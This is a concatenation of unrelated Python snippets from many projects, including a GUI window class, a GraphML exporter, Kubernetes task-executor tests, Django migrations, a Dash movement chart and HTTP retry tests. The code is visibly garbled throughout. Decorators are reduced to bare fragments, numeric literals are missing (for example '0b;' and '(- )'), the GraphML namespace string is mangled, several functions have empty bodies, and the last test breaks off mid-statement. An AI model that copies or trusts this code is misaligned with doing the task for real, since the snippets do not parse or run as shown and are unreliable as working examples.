menu_bar_manager = Instance(IMenuBarManager)
status_bar_manager = Instance(IStatusBarManager)
tool_bar_managers = List(Instance(IToolBarManager))
def _create_contents(self, parent):
def _create_menu_bar(self, parent):
def _create_status_bar(self, parent):
def _create_tool_bar(self, parent):
def _create_trim_widgets(self, parent):
def _set_window_icon(self): |
def detect_and_insert_sdk_include_and_library_dirs(include_dirs, library_dirs) -> None:
if (sys.platform == 'win32'):
r = detect_win32_sdk_include_and_library_dirs()
else:
r = None
if (r is None):
print('Automatic kinect SDK detection did not yield any results.')
else:
(include_dir, library_dir) = r
print(f'Automatically detected kinect SDK. Adding include dir: {include_dir} and library dir {library_dir}.')
include_dirs.insert(0, include_dir)
library_dirs.insert(0, library_dir) |
class GraphML():
def __init__(self, execution_trace: ExecutionTrace):
self.nodes: List = []
self.edges: List = []
for (id, n) in execution_trace.nodes.items():
self._create_node(id, f'{n.name} ({n.id})', n.name)
for tensor in execution_trace.tensors.values():
self._create_tensor_node(tensor)
for (id, n) in execution_trace.nodes.items():
self._create_edge(n.parent_id, id)
for (_, input, _) in n.get_input_tensors():
self._create_edge(input, id)
for (_, output, _) in n.get_output_tensors():
self._create_edge(id, output)
logging.info(f'nodes: {len(self.nodes)}')
logging.info(f'edges: {len(self.edges)}')
def _create_node(self, node_id: int, name: str='', type: str='', input: str='', output: str='', arg: str='', device: str='', engine: str='', is_grad: str='', info: str=''):
self.nodes.append({'id': node_id, 'name': name, 'type': type, 'input': input, 'output': output, 'arg': arg, 'is_grad': is_grad, 'device': device, 'engine': engine, 'info': info})
def _create_tensor_node(self, tensor):
self._create_node(tensor.id, f'T{tensor.id}', type='Tensor', input=tensor.sources, output=tensor.sinks)
def _create_edge(self, source, target):
self.edges.append({'source': source, 'target': target})
def write(self, name, file_name):
def write_header():
out.write('<?xml version="1.0" encoding="UTF-8"?>\n')
def graphml_begin():
graphml = '<graphml xmlns=" xmlns:xsi=" xsi:schemaLocation=" id="name" attr.name="name" attr.type="string" for="node" namespace="all::node"/>\n<key id="type" attr.name="type" attr.type="string" for="node" namespace="all::node"/>\n<key id="input" attr.name="input" attr.type="string" for="node" namespace="all::node"/>\n<key id="output" attr.name="output" attr.type="string" for="node" namespace="all::node"/>\n<key id="arg" attr.name="arg" attr.type="string" for="node" namespace="all::node"/>\n<key id="device" attr.name="device" attr.type="string" for="node" namespace="all::node"/>\n<key id="engine" attr.name="engine" attr.type="string" for="node" namespace="all::node"/>\n<key id="is_grad" attr.name="is_grad" attr.type="string" for="node" namespace="all::node"/>\n<key id="info" attr.name="info" attr.type="string" for="node" namespace="all::node"/>\n'
out.write(graphml)
def graphml_end():
out.write('</graphml>\n')
def write_graph():
out.write(f'''<graph id="{name}" edgedefault="directed">
''')
for node in self.nodes:
write_node(node)
for (id, edge) in enumerate(self.edges):
write_edge(id, edge['source'], edge['target'])
out.write('</graph>\n')
def write_node(node):
out.write(f'''<node id="{node['id']}">
''')
for (name, data) in node.items():
if ((name != 'id') and data):
out.write(f''' <data key="{name}">{data}</data>
''')
out.write('</node>\n')
def write_edge(id, source, target):
out.write(f'''<edge id="e_{id}" source="{source}" target="{target}"/>
''')
with open(file_name, 'wt') as out:
write_header()
graphml_begin()
write_graph()
graphml_end() |
class AffiliationAddressTeiTrainingDataGenerator(AbstractTeiTrainingDataGenerator):
DEFAULT_TEI_FILENAME_SUFFIX = '.affiliation.tei.xml'
def __init__(self):
super().__init__(root_training_xml_element_path=ROOT_TRAINING_XML_ELEMENT_PATH, training_xml_element_path_by_label=TRAINING_XML_ELEMENT_PATH_BY_LABEL, element_maker=TEI_E, default_tei_filename_suffix=AffiliationAddressTeiTrainingDataGenerator.DEFAULT_TEI_FILENAME_SUFFIX, default_data_filename_suffix=None, default_tei_sub_directory='affiliation-address/corpus') |
def mock_api_response(monkeypatch, status, json_data):
class MockResponse():
def __init__(self, status, json_data):
self.status = status
self.json_data = json_data
def status_code(self):
return self.status
def json(self):
return self.json_data
monkeypatch.setattr('usaspending_api.references.v2.views.cfda.post', (lambda *args, **kwargs: MockResponse(status, json_data))) |
class TorchHub(Analyser):
in_etype = Etype.Any
out_etype = Etype.Any
def pre_analyse(self, config):
if (config.get('args') is None):
config['args'] = []
if (config.get('kwargs') is None):
config['kwargs'] = {}
self.model = torch.hub.load(config['repo'], *config['args'], **config['kwargs'])
self.model.conf = 0.5
self.model.iou = 0.45
self.logger('Model loaded from remote.')
def analyse_element(self, element, config):
imgs = [Image.open(x) for x in element.paths]
results = self.model(imgs).tolist()
self.logger(f'Batched inference successfully run for element {element.id}.')
def get_preds(img_path):
idx = element.paths.index(img_path)
result = results[idx]
return [cls_and_conf(p, result.names) for p in result.pred]
return Etype.CvJson.from_preds(element, get_preds) |
class TestK8sTaskExecutor(unittest.TestCase):
('ai_flow.task_executor.kubernetes.k8s_task_executor.KubernetesTaskExecutor._list_pods')
('ai_flow.task_executor.kubernetes.k8s_task_executor.KubernetesTaskExecutor._is_task_submitted')
('ai_flow.task_executor.kubernetes.helpers.run_pod')
('ai_flow.task_executor.kubernetes.helpers.get_kube_client')
def test_run_existed_task(self, mock_client, mock_run_pod, mock_is_submmitted, mock_list_pods):
executor = KubernetesTaskExecutor()
key = TaskExecutionKey(1, 'task', 2)
mock_is_submmitted.return_value = True
executor.start_task_execution(key)
mock_run_pod.assert_not_called()
('ai_flow.task_executor.kubernetes.k8s_task_executor.KubernetesTaskExecutor._list_pods')
('ai_flow.task_executor.kubernetes.helpers.get_kube_client')
def test__is_task_submitted(self, mock_client, mock_list_pods):
executor = KubernetesTaskExecutor()
key = TaskExecutionKey(1, 'task', 3)
expected = []
for i in range(2):
mock_pod = mock.MagicMock()
mock_pod.metadata.annotations = {'workflow_execution_id': 1, 'task_name': 'task', 'seq_number': i}
expected.append(mock_pod)
mock_list_pods.return_value = expected
self.assertFalse(executor._is_task_submitted(key))
mock_pod = mock.MagicMock()
mock_pod.metadata.annotations = {'workflow_execution_id': 1, 'task_name': 'task', 'seq_number': 3}
expected.append(mock_pod)
mock_list_pods.return_value = expected
self.assertTrue(executor._is_task_submitted(key))
('ai_flow.task_executor.kubernetes.k8s_task_executor.KubernetesTaskExecutor._list_pods')
('ai_flow.task_executor.kubernetes.helpers.run_pod')
('ai_flow.task_executor.kubernetes.helpers.get_kube_client')
('ai_flow.task_executor.common.task_executor_base.TaskExecutorBase.generate_command')
def test_start_task_execution_without_template(self, mock_command, mock_client, mock_run_pod, mock_list_pods):
executor = KubernetesTaskExecutor()
executor.kube_config.config['pod_template_file'] = None
key = TaskExecutionKey(1, 'task', 2)
mock_list_pods.return_value = []
executor.start_task_execution(key)
mock_command.assert_called_once_with(key)
mock_run_pod.assert_called_once()
('ai_flow.task_executor.kubernetes.k8s_task_executor.KubernetesTaskExecutor._list_pods')
('ai_flow.task_executor.kubernetes.helpers.run_pod')
('ai_flow.task_executor.kubernetes.helpers.get_kube_client')
('ai_flow.task_executor.common.task_executor_base.TaskExecutorBase.generate_command')
def test_start_task_execution(self, mock_command, mock_client, mock_run_pod, mock_list_pods):
executor = KubernetesTaskExecutor()
template_file = os.path.join(os.path.dirname(__file__), 'base_pod.yaml')
executor.kube_config.config['pod_template_file'] = template_file
key = TaskExecutionKey(1, 'task', 2)
mock_list_pods.return_value = []
executor.start_task_execution(key)
mock_command.assert_called_once_with(key)
mock_run_pod.assert_called_once()
('ai_flow.task_executor.kubernetes.helpers.get_kube_client')
('ai_flow.task_executor.kubernetes.k8s_task_executor.KubernetesTaskExecutor._delete_pod')
('ai_flow.task_executor.kubernetes.k8s_task_executor.KubernetesTaskExecutor._list_pods')
def test_stop_task_execution(self, mock_list_pods, mock_delete_func, mock_client):
executor = KubernetesTaskExecutor()
key = TaskExecutionKey(1, 'task', 2)
mock_list_pods.return_value = [mock.MagicMock()]
executor.stop_task_execution(key)
mock_delete_func.assert_called_once() |
def test_interpolate_color() -> None:
assert (interpolate_color('#000000', '#ffffff', 0) == '#000000')
assert (interpolate_color('#000000', '#ffffff', 1) == '#ffffff')
assert (interpolate_color('#000000', '#ffffff', 0.5) == '#7f7f7f')
assert (interpolate_color('#000000', '#ffffff', (- 100)) == '#000000')
assert (interpolate_color('#000000', '#ffffff', 12345) == '#ffffff') |
class Affine(AffineOp, Elementwise):
def __init__(self, params_fn: Optional[flowtorch.Lazy]=None, *, shape: torch.Size, context_shape: Optional[torch.Size]=None, log_scale_min_clip: float=(- 5.0), log_scale_max_clip: float=3.0, sigmoid_bias: float=2.0) -> None:
super().__init__(params_fn, shape=shape, context_shape=context_shape)
self.log_scale_min_clip = log_scale_min_clip
self.log_scale_max_clip = log_scale_max_clip
self.sigmoid_bias = sigmoid_bias |
class TestOperationsLog(ApiBaseTest):
def setUp(self):
super().setUp()
(factories.OperationsLogFactory(candidate_committee_id='00', report_year=2000, status_num=1),)
(factories.OperationsLogFactory(candidate_committee_id='01', report_year=2012, status_num=0),)
(factories.OperationsLogFactory(candidate_committee_id='02', report_year=2014, status_num=1),)
(factories.OperationsLogFactory(candidate_committee_id='03', report_year=2017, receipt_date=datetime.date(2017, 3, 1)),)
(factories.OperationsLogFactory(candidate_committee_id='03', report_year=2017, coverage_end_date=datetime.date(2018, 4, 30)),)
factories.OperationsLogFactory(candidate_committee_id='03', report_year=2017, transaction_data_complete_date=datetime.date(2016, 10, 15))
def test_empty_query(self):
results = self._results(api.url_for(OperationsLogView, candidate_committee_id='10', report_year=2030))
self.assertEqual(len(results), 0)
def test_search_cand_cmte_id(self):
response = self.app.get(api.url_for(OperationsLogView, candidate_committee_id='01', report_year=2012))
self.assertEqual(response.status_code, 200)
def test_unverified_reports(self):
results = self._results(api.url_for(OperationsLogView, candidate_committee_id='01', status_num=0))
self.assertEqual(len(results), 1)
for result in results:
self.assertTrue(1, result['status_num'])
def test_verified_reports(self):
results = self._results(api.url_for(OperationsLogView, candidate_committee_id='02', status_num=1))
self.assertEqual(len(results), 1)
for result in results:
self.assertTrue(1, result['status_num'])
def test_receipt_date_range(self):
min_date = datetime.date(2017, 1, 1)
max_date = datetime.date(2017, 12, 31)
results = self._results(api.url_for(OperationsLogView, min_receipt_date=min_date))
self.assertTrue(all((each for each in results if (each['receipt_date'] >= min_date.isoformat()))))
results = self._results(api.url_for(OperationsLogView, max_receipt_date=max_date))
self.assertTrue(all((each for each in results if (each['receipt_date'] <= max_date.isoformat()))))
results = self._results(api.url_for(OperationsLogView, min_receipt_date=min_date, max_receipt_date=max_date))
self.assertTrue(all((each for each in results if (min_date.isoformat() <= each['receipt_date'] <= max_date.isoformat()))))
def test_coverage_end_date_range(self):
min_date = datetime.date(2018, 1, 1)
max_date = datetime.date(2018, 12, 31)
results = self._results(api.url_for(OperationsLogView, min_coverage_end_date=min_date))
self.assertTrue(all((each for each in results if (each['coverage_end_date'] >= min_date.isoformat()))))
results = self._results(api.url_for(OperationsLogView, max_coverage_end_date=max_date))
self.assertTrue(all((each for each in results if (each['coverage_end_date'] <= max_date.isoformat()))))
results = self._results(api.url_for(OperationsLogView, min_coverage_end_date=min_date, max_coverage_end_date=max_date))
self.assertTrue(all((each for each in results if (min_date.isoformat() <= each['coverage_end_date'] <= max_date.isoformat()))))
def test_transaction_data_complete_date_range(self):
min_date = datetime.date(2016, 1, 1)
max_date = datetime.date(2016, 12, 31)
results = self._results(api.url_for(OperationsLogView, min_transaction_data_complete_date=min_date))
self.assertTrue(all((each for each in results if (each['transaction_data_complete_date'] >= min_date.isoformat()))))
results = self._results(api.url_for(OperationsLogView, max_transaction_data_complete_date=max_date))
self.assertTrue(all((each for each in results if (each['transaction_data_complete_date'] <= max_date.isoformat()))))
results = self._results(api.url_for(OperationsLogView, min_transaction_data_complete_date=min_date, max_transaction_data_complete_date=max_date))
self.assertTrue(all((each for each in results if (min_date.isoformat() <= each['transaction_data_complete_date'] <= max_date.isoformat()))))
def test_invalid_image_number(self):
response = self.app.get(api.url_for(OperationsLogView, beginning_image_number='fec-12345'))
self.assertEqual(response.status_code, 422) |
class Migration(migrations.Migration):
dependencies = [('search', '0029_link_subaward_search_to_transaction_search')]
operations = [migrations.AddField(model_name='awardsearch', name='earliest_transaction_search', field=models.ForeignKey(db_constraint=False, help_text='The earliest transaction in transaction_search table by action_date and mod associated with this award', null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='earliest_for_award', to='search.transactionsearch')), migrations.AddField(model_name='awardsearch', name='latest_transaction_search', field=models.ForeignKey(db_constraint=False, help_text='The latest transaction in transaction_search table by action_date and mod associated with this award', null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='latest_for_award', to='search.transactionsearch'))] |
def test_task_node_with_overrides():
task_node = _workflow.TaskNode(reference_id=_generic_id, overrides=_workflow.TaskNodeOverrides(Resources(requests=[Resources.ResourceEntry(Resources.ResourceName.CPU, '1')], limits=[Resources.ResourceEntry(Resources.ResourceName.CPU, '2')]), tasks_pb2.ExtendedResources(gpu_accelerator=T4.to_flyte_idl())))
assert (task_node.overrides.resources.requests == [Resources.ResourceEntry(Resources.ResourceName.CPU, '1')])
assert (task_node.overrides.resources.limits == [Resources.ResourceEntry(Resources.ResourceName.CPU, '2')])
assert (task_node.overrides.extended_resources.gpu_accelerator == T4.to_flyte_idl())
obj = _workflow.TaskNode.from_flyte_idl(task_node.to_flyte_idl())
assert (task_node == obj) |
def test_custom_form_complex_fields_complete(db, client, user, jwt):
speaker = get_complex_custom_form_speaker(db, user)
data = json.dumps({'data': {'type': 'speaker', 'id': str(speaker.id), 'attributes': {'name': 'Areeb', 'heard-from': 'Gypsie', 'complex-field-values': {'best-friend': 'Tester'}}}})
response = client.patch(f'/v1/speakers/{speaker.id}', content_type='application/vnd.api+json', headers=jwt, data=data)
db.session.refresh(speaker)
assert (response.status_code == 200)
assert (speaker.name == 'Areeb')
assert (speaker.heard_from == 'Gypsie')
assert (speaker.complex_field_values['best_friend'] == 'Tester') |
def generate_daily_movement_chart(date):
df = pd.read_sql(sql=app.session.query(ouraActivitySamples.timestamp_local, ouraActivitySamples.met_1min, ouraActivitySamples.class_5min).filter((ouraActivitySamples.summary_date == date), (ouraActivitySamples.class_5min != None)).statement, con=engine, index_col='timestamp_local')
app.session.remove()
df['color'] = df['met_1min'].apply(daily_movement_color)
df['action'] = df['met_1min'].apply((lambda x: daily_movement_color(x, name=True)))
df['movement_tooltip'] = ['<b>{}:</b> {} MET'.format(x, y) for (x, y) in zip(df['action'], df['met_1min'])]
return dcc.Graph(id='daily-movement-chart', className='col-lg-12', config={'displayModeBar': False}, figure={'data': [go.Bar(x=df.index, y=df['met_1min'], text=df['movement_tooltip'], hoverinfo='text+x', marker={'color': df['color'].tolist()}), go.Scatter(name='Low', x=df.index, y=[1 for x in df.index], mode='lines', hoverinfo='x', line={'dash': 'dot', 'color': 'rgb(150,150,150)', 'width': 0.5}, showlegend=False), go.Scatter(name='Med', x=df.index, y=[3 for x in df.index], mode='lines', hoverinfo='x', line={'dash': 'dot', 'color': 'rgb(150,150,150)', 'width': 0.5}, showlegend=False), go.Scatter(name='High', x=df.index, y=[7 for x in df.index], mode='lines', hoverinfo='x', line={'dash': 'dot', 'color': 'rgb(150,150,150)', 'width': 0.5}, showlegend=False)], 'layout': go.Layout(height=150, transition=dict(duration=transition), font=dict(size=10, color=white), xaxis=dict(showticklabels=True, tickformat='%I:%M %p', showgrid=False, showline=True, color=white), yaxis=dict(showticklabels=True, range=[0, (df['met_1min'].max() if (df['met_1min'].max() > 7) else 8)], tickvals=[1, 3, 7], ticktext=['Low ', 'Med ', 'High '], showgrid=True), showlegend=False, margin={'l': 40, 'b': 30, 't': 0, 'r': 40}, hovermode='x')}) |
class StringSub(StringTransform):
def __init__(self, substring: str, replacement: str, *, reversible: bool=True):
super().__init__(reversible)
self.substring = substring
self.replacement = replacement
def _apply(self, string: str) -> str:
return string.replace(self.substring, self.replacement)
def _revert(self, string: str) -> str:
return string.replace(self.replacement, self.substring) |
class ItemTests(unittest.TestCase):
def test_unicode(self):
item = Item()
item.Name = 'test'
self.assertEqual(str(item), 'test')
def test_to_ref(self):
item = Item()
item.Name = 'test'
item.Id = 100
ref = item.to_ref()
self.assertEqual(ref.name, 'test')
self.assertEqual(ref.type, 'Item')
self.assertEqual(ref.value, 100)
def test_valid_object_name(self):
obj = Item()
client = QuickBooks()
result = client.isvalid_object_name(obj.qbo_object_name)
self.assertTrue(result) |
class Local(DeployBase):
def __init__(self, config_json=None, credentials_json=None):
DeployBase.__init__(self, config_json=config_json, credentials_json=credentials_json)
def deploy(self, model_id):
app_type = self._app_type(model_id)
if (app_type == 'streamlit'):
app = StreamlitApp()
app.run(model_id)
if (app_type == 'swagger'):
pass
if (app_type == 'dash'):
pass |
def test_build_dirhtml_from_template(temp_with_override, cli):
book = (temp_with_override / 'new_book')
_ = cli.invoke(commands.create, book.as_posix())
build_result = cli.invoke(commands.build, [book.as_posix(), '-n', '-W', '--builder', 'dirhtml'])
assert (build_result.exit_code == 0), build_result.output
html = book.joinpath('_build', 'dirhtml')
assert html.joinpath('index.html').exists()
assert html.joinpath('intro', 'index.html').exists() |
def _bump_protocol_specification_id(package_path: Path, configuration: ProtocolConfig) -> None:
spec_id: PublicId = configuration.protocol_specification_id
old_version = semver.VersionInfo.parse(spec_id.version)
new_version = str(old_version.bump_minor())
new_spec_id = PublicId(spec_id.author, spec_id.name, new_version)
configuration.protocol_specification_id = new_spec_id
with (package_path / DEFAULT_PROTOCOL_CONFIG_FILE).open('w') as file_output:
ConfigLoaders.from_package_type(configuration.package_type).dump(configuration, file_output) |
def extractMiirakuruWordpressCom(item):
(vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
if ((not (chp or vol)) or ('preview' in item['title'].lower())):
return None
tagmap = [('rett', 'The Story of Rett Pott', 'translated'), ('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel')]
for (tagname, name, tl_type) in tagmap:
if (tagname in item['tags']):
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False |
def derivative_upward_kernel(fft_grid, order=1):
dims = fft_grid.dims
freq_easting = fft_grid.coords[dims[1]]
freq_northing = fft_grid.coords[dims[0]]
k_easting = ((2 * np.pi) * freq_easting)
k_northing = ((2 * np.pi) * freq_northing)
da_filter = (np.sqrt(((k_easting ** 2) + (k_northing ** 2))) ** order)
return da_filter |
def find_music_dir():
if ('XDG_MUSIC_DIR' in os.environ):
return os.environ['XDG_MUSIC_DIR']
conf = open_first_xdg_config('user-dirs.dirs')
if (conf is not None):
for line in conf:
if (not line.startswith('XDG_MUSIC_DIR=')):
continue
path = shlex.split(line[14:])[0]
if path.startswith('$HOME/'):
return os.path.expanduser(('~' + path[5:]))
elif path.startswith('/'):
return path
else:
break
paths = ('~/Music', '~/music')
for path in map(os.path.expanduser, paths):
if os.path.isdir(path):
return path
return None |
class TestGetIndices(TestCase):
IDX1 = 'index-2016.03.03'
IDX2 = 'index-2016.03.04'
SETTINGS = {IDX1: {'state': 'open'}, IDX2: {'state': 'open'}}
def test_client_exception(self):
client = Mock()
client.indices.get_settings.return_value = self.SETTINGS
client.indices.get_settings.side_effect = FAKE_FAIL
with pytest.raises(FailedExecution):
get_indices(client)
def test_positive(self):
client = Mock()
client.indices.get_settings.return_value = self.SETTINGS
self.assertEqual([self.IDX1, self.IDX2], sorted(get_indices(client)))
def test_empty(self):
client = Mock()
client.indices.get_settings.return_value = {}
self.assertEqual([], get_indices(client)) |
.parametrize('cls', load_class_with_subfeature())
class TestApiClass():
def test_issubclass(self, cls: ProviderInterface):
assert issubclass(cls, ProviderInterface), f'Please inherit {cls} from ProviderInterface'
def test_info_file_exists(self, cls: ProviderInterface):
provider = cls.provider_name
info = load_provider(ProviderDataEnum.INFO_FILE, provider)
assert info, 'info file does not exist'
def test_version_exists(self, cls: ProviderInterface):
provider = cls.provider_name
info = load_provider(ProviderDataEnum.INFO_FILE, provider)
for feature in info:
for subfeature in info[feature]:
if (not info[feature][subfeature].get('version')):
for phase in info[feature][subfeature]:
assert ('version' in info[feature][subfeature][phase]), "missing 'version' property"
else:
assert ('version' in info[feature][subfeature]), "missing 'version' property"
def test_implemented_features_documented(self, cls: ProviderInterface):
provider = cls.provider_name
info = load_provider(ProviderDataEnum.INFO_FILE, provider)
implemented_features = list_features(provider_name=provider)
for (_, feature, subfeature, *phase) in implemented_features:
if phase:
feature_info = info.get(feature, {}).get(subfeature, {}).get(phase[0], {})
else:
feature_info = info.get(feature, {}).get(subfeature, {})
assert feature_info, f"Please add {(feature, subfeature, (phase[0] if phase else ''))} to info.json file of {cls.__name__}" |
class ExcludeFieldsMixin(object):
def get_fields(self):
fields = super(ExcludeFieldsMixin, self).get_fields()
try:
exclude = self.context['exclude']
except KeyError:
return fields
hierarchy = _get_serializer_hierarchy(self)
exclude_nested_names = _get_nested_field_names(hierarchy, exclude)
exclude_names = {n for n in exclude_nested_names if (EXPAND_DELIMITER not in n)}
unmatched_names = exclude_names.difference(set(fields))
if unmatched_names:
raise ValueError('{0} fields not found on serializer "{1}"'.format(_field_names_list(unmatched_names), self.__class__.__name__))
return OrderedDict(((name, field) for (name, field) in fields.items() if (name not in exclude_names))) |
class Cutting2DMazeState():
def __init__(self, inventory: [(int, int)], max_pieces_in_inventory: int, current_demand: (int, int), raw_piece_size: (int, int)):
self.inventory = inventory.copy()
self.max_pieces_in_inventory = max_pieces_in_inventory
self.current_demand = current_demand
self.raw_piece_size = raw_piece_size |
class TestCharacters(BaseEvenniaTest):
def setUp(self):
super().setUp()
self.character = create.create_object(EvAdventureCharacter, key='testchar')
def test_abilities(self):
self.character.strength += 2
self.assertEqual(self.character.strength, 3)
def test_heal(self):
self.character.hp = 0
self.character.hp_max = 8
self.character.heal(1)
self.assertEqual(self.character.hp, 1)
self.character.heal(100)
self.assertEqual(self.character.hp, 8)
def test_at_damage(self):
self.character.hp = 8
self.character.at_damage(5)
self.assertEqual(self.character.hp, 3)
def test_at_pay(self):
self.character.coins = 100
result = self.character.at_pay(60)
self.assertEqual(result, 60)
self.assertEqual(self.character.coins, 40)
result = self.character.at_pay(100)
self.assertEqual(result, 40)
self.assertEqual(self.character.coins, 0) |
class TestMatrixStoreConnection(SimpleTestCase):
def setUpClass(cls):
cls.factory = DataFactory()
cls.factory.create_all(start_date='2018-06-01', num_months=6, num_practices=6, num_presentations=6)
cls.matrixstore = matrixstore_from_data_factory(cls.factory)
def test_practice_offsets(self):
practice_codes = sorted((p['code'] for p in self.factory.practices))
expected_offsets = dict(zip(practice_codes, range(len(practice_codes))))
self.assertEqual(self.matrixstore.practice_offsets, expected_offsets)
def test_date_offsets(self):
dates = sorted((m[:10] for m in self.factory.months))
expected_offsets = dict(zip(dates, range(len(dates))))
self.assertEqual(self.matrixstore.date_offsets, expected_offsets)
def test_practices(self):
expected_practices = sorted((p['code'] for p in self.factory.practices))
self.assertEqual(self.matrixstore.practices, expected_practices)
def test_dates(self):
expected_dates = sorted((m[:10] for m in self.factory.months))
self.assertEqual(self.matrixstore.dates, expected_dates)
def test_query(self):
excluded_code = self.factory.presentations[0]['bnf_code']
results = self.matrixstore.query('SELECT bnf_code, items FROM presentation WHERE bnf_code != ?', [excluded_code])
results = list(results)
for (bnf_code, items_matrix) in results:
self.assertNotEqual(bnf_code, excluded_code)
self.assertIsInstance(items_matrix[(0, 0)], numbers.Number)
self.assertGreaterEqual(len(results), 1)
def test_query_one(self):
target_code = self.factory.presentations[0]['bnf_code']
(bnf_code, items_matrix) = self.matrixstore.query_one('SELECT bnf_code, items FROM presentation WHERE bnf_code = ?', [target_code])
self.assertEqual(bnf_code, target_code)
self.assertIsInstance(items_matrix[(0, 0)], numbers.Number)
def test_matrix_sum(self):
target_codes = [p['bnf_code'] for p in self.factory.presentations][:3]
items_matrix = self.matrixstore.query_one('SELECT MATRIX_SUM(items) FROM presentation WHERE bnf_code IN (?, ? ,?)', target_codes)[0]
items_dict = defaultdict(int)
for p in self.factory.prescribing:
if (p['bnf_code'] in target_codes):
items_dict[(p['practice'], p['month'][:10])] += p['items']
for (practice, row_offset) in self.matrixstore.practice_offsets.items():
for (date, col_offset) in self.matrixstore.date_offsets.items():
value = items_matrix[(row_offset, col_offset)]
expected_value = items_dict[(practice, date)]
self.assertEqual(value, expected_value)
def tearDownClass(cls):
cls.matrixstore.close() |
class TestRetryingSender():
def test_repr(self):
s = RetryingSender()
assert repr(s).startswith('RetryingSender(')
def test_rate_limited_request_retried_after_set_seconds(self):
time = MagicMock()
fail = rate_limit_response()
success = ok_response()
sender = mock_sender(fail, success)
s = RetryingSender(sender=sender)
with patch((module + '.time'), time):
s.send(mock_request())
time.sleep.assert_called_once_with((1 + 1))
.asyncio
async def test_async_rate_limited_request_retried_after_set_seconds(self):
asyncio = AsyncMock()
fail = rate_limit_response()
success = ok_response()
sender = mock_sender(fail, success, is_async=True)
s = RetryingSender(sender=sender)
with patch((module + '.asyncio'), asyncio):
(await s.send(mock_request()))
asyncio.sleep.assert_called_once_with((1 + 1))
def test_default_retry_after_is_one(self):
time = MagicMock()
fail = rate_limit_response()
del fail.headers['Retry-After']
success = ok_response()
sender = mock_sender(fail, success)
s = RetryingSender(sender=sender)
with patch((module + '.time'), time):
s.send(mock_request())
time.sleep.assert_called_once_with((1 + 1))
.asyncio
async def test_async_default_retry_after_is_one(self):
asyncio = AsyncMock()
fail = rate_limit_response()
del fail.headers['Retry-After']
success = ok_response()
sender = mock_sender(fail, success, is_async=True)
s = RetryingSender(sender=sender)
with patch((module + '.asyncio'), asyncio):
(await s.send(mock_request()))
asyncio.sleep.assert_called_once_with((1 + 1))
def test_failing_request_but_no_retries_returns_failed(self):
fail = failed_response()
success = ok_response()
sender = mock_sender(fail, success)
s = RetryingSender(sender=sender)
r = s.send(mock_request())
assert (r is fail)
.asyncio
async def test_async_failing_request_but_no_retries_returns_failed(self):
fail = failed_response()
success = ok_response()
sender = mock_sender(fail, success, is_async=True)
s = RetryingSender(sender=sender)
r = (await s.send(mock_request()))
assert (r is fail)
def test_failing_request_retried_max_times(self):
fail = failed_response()
success = ok_response()
sender = mock_sender(fail, fail, fail, success)
s = RetryingSender(retries=2, sender=sender)
with patch((module + '.time'), MagicMock()):
s.send(mock_request())
assert (sender.send.call_count == 3)
.asyncio
async def test_async_failing_request_retried_max_times(self):
fail = failed_response()
success = ok_response()
sender = mock_sender(fail, fail, fail, success, is_async=True)
s = RetryingSender(retries=2, sender=sender)
with patch((module + '.asyncio'), AsyncMock()):
(await s.send(mock_request()))
assert (sender.send.call_count == 3)
def test_retry_returns_on_first_success(self):
fail = failed_response()
success = ok_response()
sender = mock_sender(fail, fail, success, fail, success)
s = RetryingSender(retries=5, sender=sender)
with patch((module + '.time'), MagicMock()):
s.send(mock_request())
assert (sender.send.call_count == 3)
.asyncio
async def test_async_retry_returns_on_first_success(self):
fail = failed_response()
success = ok_response()
sender = mock_sender(fail, fail, success, fail, is_async=True)
s = RetryingSender(retries=5, sender=sender)
with patch((module + '.asyncio'), AsyncMock()):
(await s.send(mock_request()))
assert (sender.send.call_count == 3)
def test_rate_limited_retry_doesnt_decrease_retry_count(self):
fail = failed_response()
rate = rate_limit_response()
success = ok_response()
sender = mock_sender(fail, rate, fail, success)
s = RetryingSender(retries=2, sender=sender)
with patch((module + '.time'), MagicMock()):
s.send(mock_request())
assert (sender.send.call_count == 4)
.asyncio
async def test_async_rate_limited_retry_doesnt_decrease_retry_count(self):
fail = failed_response()
rate = rate_limit_response()
success = ok_response()
sender = mock_sender(fail, rate, fail, success, is_async=True)
s = RetryingSender(retries=2, sender=sender)
with patch((module + '.asyncio'), AsyncMock()):
(await s.send(mock_request()))
assert (sender.send.call_count == 4) |
.parametrize('input, output', [(0, 0), (float('inf'), float('inf')), (float('-inf'), float('-inf')), (0.1, 0.1), ((- 0.0), (- 0.0)), (0., 0.1), (1, 1), ((- 1), (- 1)), ((- 0.), (- 0.1)), ((- ), (- )), ((- 0.), (- 0.)), (0.5, 0.5), (1.9e-15, 1.9e-15)])
def test_fix_float_single_double_conversion(input, output):
assert (util.fix_float_single_double_conversion(input) == output) |
class OptionPlotoptionsPictorialSonificationTracksMappingHighpass(Options):
def frequency(self) -> 'OptionPlotoptionsPictorialSonificationTracksMappingHighpassFrequency':
return self._config_sub_data('frequency', OptionPlotoptionsPictorialSonificationTracksMappingHighpassFrequency)
def resonance(self) -> 'OptionPlotoptionsPictorialSonificationTracksMappingHighpassResonance':
return self._config_sub_data('resonance', OptionPlotoptionsPictorialSonificationTracksMappingHighpassResonance) |
.skipif(bool(missing_avr_buildtools), reason=str(missing_avr_buildtools))
def test_model_size_avr8():
avr_example_program = '\n #include <stdbool.h>\n #include <avr/io.h>\n #include <util/delay.h>\n\n int main()\n {\n // set PINB0 to output in DDRB\n DDRB |= 0b;\n\n // Set input\n DDRB &= ~(1 << PINB4);\n\n const bool pin_state = (PINB & (1 << PINB4)) >> PINB4;\n\n const float f = 2.0+ (pin_state*3.3 / 7.4);\n const int out = f < 1.5; \n\n // set PINB0 low\n PORTB &= 0b + out;\n _delay_ms(500);\n }\n '
code = avr_example_program
sizes = get_program_size(code, platform='avr')
assert (sizes['program'] >= 1000), sizes |
def test_eth_call_offchain_lookup_raises_when_ccip_read_is_disabled(w3, offchain_lookup_contract):
with pytest.raises(OffchainLookup):
offchain_lookup_contract.functions.testOffchainLookup(OFFCHAIN_LOOKUP_CONTRACT_TEST_DATA).call(ccip_read_enabled=False)
with pytest.raises(OffchainLookup):
offchain_lookup_contract.caller(ccip_read_enabled=False).testOffchainLookup(OFFCHAIN_LOOKUP_CONTRACT_TEST_DATA)
w3.provider.global_ccip_read_enabled = False
with pytest.raises(OffchainLookup):
